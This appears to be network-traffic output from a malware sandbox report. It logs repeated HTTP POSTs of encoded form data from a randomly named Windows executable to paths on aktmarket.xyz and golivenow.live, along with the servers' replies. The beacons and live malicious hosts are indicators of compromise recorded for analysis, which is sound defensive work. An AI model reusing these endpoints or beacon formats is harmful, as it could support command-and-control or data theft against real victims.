                                                          Jan 11, 2025 04:06:54.258883953 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                          Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                          Jan 11, 2025 04:06:54.259021044 CET1236INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                          Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                          Jan 11, 2025 04:06:54.259033918 CET988INData Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                          Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.75132513.248.169.48806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:59.310039043 CET692OUTPOST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 70 73 75 34 4a 6c 74 43 47 54 5a 75 55 71 58 49 59 6f 6d 34 4f 49 64 50 33 33 69 57 69 6b 32 56 46 42 6f 66 48 37 6d 44 69 69 73 57 42 75 78 72 41 51 3d 3d
                                                          Data Ascii: -pztsZ6x=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3psu4JltCGTZuUqXIYom4OIdP33iWik2VFBofH7mDiisWBuxrAQ==
                                                          Jan 11, 2025 04:06:59.772159100 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.75132613.248.169.48806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:01.857254028 CET712OUTPOST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 6c 30 7a 31 47 67 31 43 72 67 48 41 73 48 4b 5a 53 69 39 56 4a 38 4d 38 51 76 57 6f 61 6f 53 6f 5a 2b 58 49 4a 48 6a 48 78 49 72 43 37 76 33 75 34 3d
                                                          Data Ascii: -pztsZ6x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZl0z1Gg1CrgHAsHKZSi9VJ8M8QvWoaoSoZ+XIJHjHxIrC7v3u4=
                                                          Jan 11, 2025 04:07:02.302726984 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.75132713.248.169.48806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:04.411258936 CET1725OUTPOST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 4e 58 6d 58 78 4a 75 66 73 53 6b 57 42 38 4b 36 6a 77 30 4d 45 57 38 78 73 79 65 54 7a 30 58 4a 41 46 47 4d 62 48 72 59 34 71 79 48 66 35 70 30 58 75 37 34 69 76 4b 43 43 55 63 4a 34 69 56 36 43 56 32 49 71 74 75 54 49 53 70 53 72 6b 4a 4f 62 4e 35 6d 69 63 78 37 69 43 6c 6c 70 47 46 78 33 4b 42 2b 72 4e 75 6a 4e 47 56 7a 2f 31 6b 31 34 76 47 2b 42 33 71 74 31 41 58 72 55 42 56 66 66 79 62 74 30 61 6d 44 4f 34 73 50 49 4c 63 61 6d 79 54 32 73 38 30 56 54 71 32 46 44 79 50 68 59 61 39 70 4d 63 31 4a 46 45 48 6a 6e 64 54 6b 78 64 39 63 68 39 65 39 53 6d 75 34 70 6b 6a 47 [TRUNCATED]
                                                          Data Ascii: -pztsZ6x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WETNXmXxJufsSkWB8K6jw0MEW8xsyeTz0XJAFGMbHrY4qyHf5p0Xu74ivKCCUcJ4iV6CV2IqtuTISpSrkJObN5micx7iCllpGFx3KB+rNujNGVz/1k14vG+B3qt1AXrUBVffybt0amDO4sPILcamyT2s80VTq2FDyPhYa9pMc1JFEHjndTkxd9ch9e9Smu4pkjGzMMbZLV9rnpR+Uuab1yf6YRExCUtr8K+v5Nd67JyY9fSefxi7piYh0Wu3I4WDHuNTkLMzayTPIo8lxWzvQbosuK4hgcKvFeIuSKyBR8n4y65CO5DJ68clRi+90HleazodkrtNVWBiWa3iz6rNFbVnfusOZ1JgFs2M6h+NFYS833z1OLqGIaQvnmO/pf06YcrSru/pOKjj+IjaM9n5qTSpoZ+yFTsAOeRDZfCB/Ih+ycUXfNPNWLBc3TRBVg7I8B1kS5Hy8YigDwNZqj952JzpsLanxmEzjgm3DDF/NJqmHknVMuva+A2XiGTf4HuT33WpQQN+xyumtWugsBIUphBsHyWiMkC87NS6gSXqBLpjGQ+g6p5E+HJY8SywnsFNt57TO0Q6wTGyw7nCtRQOiMk0P3k735YwAjCrcf1zfHjWDNQYHcmwJuooVCgaMZ+H1eoYTFQ1efvg4II7AUI86FBd5icqpXDTv20UyqCwi8i+2iu/HHRlyxZ52quvA78Adg1p5uc917htrqSZRZsSlW5mpi7iotEzK6Li5/BH/iYuZih/RixDr0SfETVMCzzhPq8YhTiQgbfO31SCWKSZ959CovmQ07xY5K1WebAJNlkSrGWpIOZMk2nSp5L/zUjUBHVLyHnbSM8jR7SKK3BTE/md81CthZm2tGW+X [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.75132813.248.169.48806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:06.946891069 CET432OUTGET /wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:07:07.422849894 CET404INHTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Sat, 11 Jan 2025 03:07:07 GMT
                                                          content-length: 283
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 48 63 3d 5f 78 5a 68 78 72 45 78 52 4a 70 58 79 34 26 2d 70 7a 74 73 5a 36 78 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 59 35 37 2f 52 61 43 4f 32 70 58 79 41 47 30 62 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 32 34 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 4d 65 67 70 55 74 31 66 75 65 2b 69 4c 48 59 6c 76 47 37 36 74 77 4d 6f 74 4e 6a 4e 76 74 30 53 74 52 30 4f 30 62 68 35 6e 4f 41 42 59 53 79 5a 33 74 43 78 61 4f 54 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.75132966.29.149.46806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:12.572743893 CET695OUTPOST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 50 75 6e 34 6f 55 76 43 7a 65 62 4b 6a 34 6c 49 42 62 4f 38 6e 6b 6a 7a 4c 68 6f 71 42 57 30 4e 74 6d 50 36 75 78 71 6e 49 65 35 70 6f 38 4a 61 47 41 3d 3d
                                                          Data Ascii: -pztsZ6x=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStPun4oUvCzebKj4lIBbO8nkjzLhoqBW0NtmP6uxqnIe5po8JaGA==
                                                          Jan 11, 2025 04:07:13.189049959 CET637INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:13 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.75133066.29.149.46806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:15.128312111 CET715OUTPOST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 62 49 50 6a 4d 63 57 77 70 34 76 6e 4c 69 6a 54 65 47 58 70 63 44 6c 75 6f 65 51 7a 58 77 52 6f 51 39 50 46 6a 72 6f 7a 71 42 78 53 31 43 51 47 73 3d
                                                          Data Ascii: -pztsZ6x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51bIPjMcWwp4vnLijTeGXpcDluoeQzXwRoQ9PFjrozqBxS1CQGs=
                                                          Jan 11, 2025 04:07:15.753412962 CET637INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:15 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.75133166.29.149.46806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:07:17.670074940 CET1728OUTPOST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 56 38 54 6f 4b 4a 55 57 6a 38 5a 33 6e 48 66 6e 75 35 74 58 67 58 4b 42 64 33 2f 78 43 36 63 71 4e 4b 67 71 49 39 6e 50 35 43 6d 74 6e 62 53 47 6c 45 45 42 53 78 56 77 57 2f 31 72 54 43 47 4b 62 38 68 75 64 46 66 47 57 69 51 48 70 4d 73 4a 58 50 51 6a 56 44 34 32 78 6f 64 43 43 58 35 4d 46 46 7a 6d 4f 49 52 43 57 48 56 44 63 58 31 75 67 39 48 37 4a 45 49 31 61 71 64 73 32 74 2b 2b 66 75 57 77 76 33 72 78 64 6e 5a 70 33 6a 5a 65 41 73 50 53 47 67 32 76 4a 4d 6b 44 51 59 6e 54 7a 47 56 5a 70 57 39 52 4e 49 30 74 6b 50 59 35 42 71 44 6d 61 62 38 69 79 6d 51 37 68 6c 50 67 [TRUNCATED]
                                                          Data Ascii: -pztsZ6x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubV8ToKJUWj8Z3nHfnu5tXgXKBd3/xC6cqNKgqI9nP5CmtnbSGlEEBSxVwW/1rTCGKb8hudFfGWiQHpMsJXPQjVD42xodCCX5MFFzmOIRCWHVDcX1ug9H7JEI1aqds2t++fuWwv3rxdnZp3jZeAsPSGg2vJMkDQYnTzGVZpW9RNI0tkPY5BqDmab8iymQ7hlPgU7R0Y3MW2DrsUOu+vlQ8YhNLlgXE0DnqScyH8j00D1jbtRzHdhaxooalbryYeznwMnOBNB7WikA2Ux5H6XWd7gqnHUKoldGfRxPnrrMiiOKXsC3eFvTf98gTwYoMBXPHQjVrI/lnY800bU86vqLB4dALzAJIAEB2aqJUHCJnIWR4rz+roS1hc7zo/INmTETC5ENsPdTnCf8BCAnt0bYtFBQTECbexXOGKXorbULiTV+phtL3jCdOpMBqKdUrF3ig2oShDH1TpWoOgkk4aNw/NJtaSxRFJwVvpmk6BmuKe6mQfRQvETEc+bEJHR3WuCNO9RH5K/zkQmhwBIV0xBcNj5747j0OSPluTYtvW5lePM240JXUgs4l0S63vyE6fGPDHi6zbVqe7xMiSubeG+flpV66NKhdWC7DtbkKmjampSp6A9ERfJinMg8RJocdlEZh9XqaoilmxqfH/vFdk25InissQNtS7/n+0tW/ArZjnkhm30HM+xs7oYqUfDov6VRmwBp6r2s/3pPpOVgQIN3l8+/oVZo871X5rhaZfjrvIYKxbpQ79mq0rBtQz1+V8T7N/b2KAEXKxSlh6wv9NAP0AA56zzamUGoyFjQHRQWPXAXnlDk+SbxqTcKpm29cTuT8WseUHK//liGaGS2qZknuqFfxZ35PTFTbOK [TRUNCATED]
                                                          Jan 11, 2025 04:07:18.269484043 CET637INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:18 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
